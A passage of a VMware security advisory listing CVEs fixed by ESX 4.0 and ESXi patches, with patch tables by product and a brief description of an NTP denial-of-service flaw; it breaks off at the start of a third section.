CVE numbers:   CVE-2009-2695 CVE-2009-2908 CVE-2009-3228
   CVE-2009-3286 CVE-2009-3547 CVE-2009-3613
   CVE-2009-3612 CVE-2009-3620 CVE-2009-3621
   CVE-2009-3726 CVE-2007-4567 CVE-2009-4536
   CVE-2009-4537 CVE-2009-4538 CVE-2006-6304
   CVE-2009-2910 CVE-2009-3080 CVE-2009-3556
   CVE-2009-3889 CVE-2009-3939 CVE-2009-4020
   CVE-2009-4021 CVE-2009-4138 CVE-2009-4141
   CVE-2009-4272 CVE-2009-3563 CVE-2009-4355
   CVE-2009-2409 CVE-2009-0590 CVE-2009-1377
   CVE-2009-1378 CVE-2009-1379 CVE-2009-1386
   CVE-2009-1387 CVE-2009-4212 CVE-2009-1384
   CVE-2010-0097 CVE-2010-0290 CVE-2009-3736
   CVE-2010-0001 CVE-2010-0426 CVE-2010-0427
   CVE-2010-0382
- 

1. Summary

   ESXi update for ntp and ESX Console OS (COS) updates for COS
   kernel, openssl, krb5, gcc, bind, gzip, sudo.

2. Relevant releases

   VMware ESX 4.0.0 without patches ESX400-201005401-SG,
   ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG,
   ESX400-201005405-SG, ESX400-201005409-SG

3. Problem Description

 a. Service Console update for COS kernel

Updated COS package kernel addresses the security issues that are
fixed through versions 2.6.18-164.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
fixed in kernel 2.6.18-164.6.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,
CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
VirtualCenter  any   Windows  not affected

hosted *   any   any  not affected

ESXi   any   ESXi not affected

ESX4.0   ESX  ESX400-201005401-SG
ESX3.5   ESX  not applicable
ESX3.0.3 ESX  not applicable
ESX2.5.5 ESX  not applicable

vMA4.0   RHEL5affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. ESXi userworld update for ntp

The Network Time Protocol (NTP) is used to synchronize the time of
a computer client or server to another server or reference time
source.

A vulnerability in ntpd could allow a remote attacker to cause a
denial of service (CPU and bandwidth consumption) by using
MODE_PRIVATE to send a spoofed (1) request or (2) response packet
that triggers a continuous exchange of MODE_PRIVATE error responses
between two NTP daemons.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3563 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
VirtualCenter  any   Windows  not affected

hosted *   any   any  not affected

ESXi   4.0   ESXi ESXi400-201005401-SG
ESXi   3.5   ESXi affected, patch pending

ESXany   ESX  not applicable

vMAany   RHEL5not applicable

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Service